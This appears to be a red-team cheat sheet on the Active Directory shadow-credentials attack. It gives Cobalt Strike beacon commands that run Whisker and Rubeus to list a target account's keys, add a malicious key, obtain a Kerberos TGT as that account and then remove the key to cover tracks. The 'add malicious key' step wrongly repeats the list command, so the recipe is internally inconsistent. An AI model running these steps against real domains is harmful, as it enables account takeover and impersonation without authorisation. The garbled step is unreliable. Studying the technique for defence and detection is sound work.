When an account has shadow credentials configured, the client can obtain a TGT using these credentials (key). In other words, if an attacker has enough privileges to modify a target account’s DACL to add a shadow credential, he can obtain a TGT as that user.

The attack relies on the tool Whisker.

Attack Overview

  • Take note of any existing keys on target account.
  • Add malicious key to target account.
  • Use key to obtain TGT.
  • Remove only the malicious key from target after use.
# list existing keys
beacon> execute-assembly C:\Tools\Whisker\Whisker\bin\Release\Whisker.exe list /target:[account]
 
# add malicious key (record base64-encoded certificate, its encryption password, and deviceid)
beacon> execute-assembly C:\Tools\Whisker\Whisker\bin\Release\Whisker.exe list /target:[target-account]
 
# get TGT
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:[target-account] /certificate:[cert-base64] /password:"[cert-password]" /nowrap
 
# remove added key (alternatively use `clear` to remove all keys)
beacon> execute-assembly C:\Tools\Whisker\Whisker\bin\Release\Whisker.exe remove /target:[target-account] /deviceid:[key-deviceid]